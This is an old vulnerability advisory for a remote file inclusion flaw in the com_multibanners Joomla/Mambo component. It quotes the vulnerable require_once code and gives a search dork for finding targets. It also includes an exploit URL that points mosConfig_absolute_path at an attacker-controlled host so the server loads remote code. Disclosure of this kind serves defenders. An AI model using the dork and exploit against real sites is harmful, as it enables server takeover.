Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

2006.07.26
Credit: Blue|Spy
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################SolpotCrew Community################################ # # Com Multibanners Remote File Inclusion (mosConfig_absolute_path) # # original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt # ######################################################################## ######### # # # Bug Found By :Blue|Spy # # contact: mail (at) blue-spy (dot) net [email concealed] # # Website : http://kunamgede.biz, http://blue-spy.net # ######################################################################## ######## # # # Greetz: h4ntu , Fungky, Solpot, Matdhule # and all crew #mardongan @ irc.dal.net # # ######################################################################## ####### code from extadminmenus.class.php if (phpversion() < '4.2.0') { require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' ); } if (phpversion() < '4.3.0') { require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' ); } Dork: inurl:com_multibanners exploit: http://site.com/[path]//administrator/components/com_multibanners/extadm inmenus.class.php?mosConfig_absolute_path=[attacker] ##############################MY LOVE JUST FOR U LIENA######################### ########################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top